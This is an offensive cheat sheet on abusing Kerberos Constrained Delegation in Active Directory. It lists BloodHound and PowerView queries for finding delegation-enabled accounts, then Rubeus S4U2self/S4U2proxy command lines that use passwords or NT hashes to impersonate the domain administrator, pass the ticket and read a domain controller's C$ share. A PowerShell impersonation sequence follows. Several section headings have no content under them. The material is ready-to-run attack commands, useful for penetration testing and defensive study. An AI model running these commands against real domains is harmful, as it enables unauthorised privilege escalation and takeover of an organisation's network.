Kerberos Delegation - Constrained Delegation
Kerberos Constrained Delegation (KCD) is a security feature in Microsoft's Active Directory (AD) that allows a service to impersonate a user or another service in order to access resources on behalf of that user or service.
Identify a Constrained Delegation
- BloodHound:
MATCH p = (a)-[:AllowedToDelegate]->(c:Computer) RETURN p
- PowerView:
Get-NetComputer -TrustedToAuth | select samaccountname,msds-allowedtodelegateto | ft
- Native
- bloodyAD:
Exploit the Constrained Delegation
-
Impacket
-
Rubeus: S4U2 attack (S4U2self + S4U2proxy)
# with a password Rubeus.exe s4u /nowrap /msdsspn:"time/target.local" /altservice:cifs /impersonateuser:"administrator" /domain:"domain" /user:"user" /password:"password" # with a NT hash Rubeus.exe s4u /user:user_for_delegation /rc4:user_pwd_hash /impersonateuser:user_to_impersonate /domain:domain.com /dc:dc01.domain.com /msdsspn:time/srv01.domain.com /altservice:cifs /ptt Rubeus.exe s4u /user:MACHINE$ /rc4:MACHINE_PWD_HASH /impersonateuser:Administrator /msdsspn:"cifs/dc.domain.com" /altservice:cifs,http,host,rpcss,wsman,ldap /ptt dir \\dc.domain.com\c$
-
Rubeus: use an existing ticket to perform a S4U2 attack to impersonate the "Administrator"
-
Rubeus : using aes256 keys
Impersonate a domain user on a resource
Require: * SYSTEM level privileges on a machine configured with constrained delegation
PS> [Reflection.Assembly]::LoadWithPartialName('System.IdentityModel') | out-null
PS> $idToImpersonate = New-Object System.Security.Principal.WindowsIdentity @('administrator')
PS> $idToImpersonate.Impersonate()
PS> [System.Security.Principal.WindowsIdentity]::GetCurrent() | select name
PS> ls \\dc01.offense.local\c$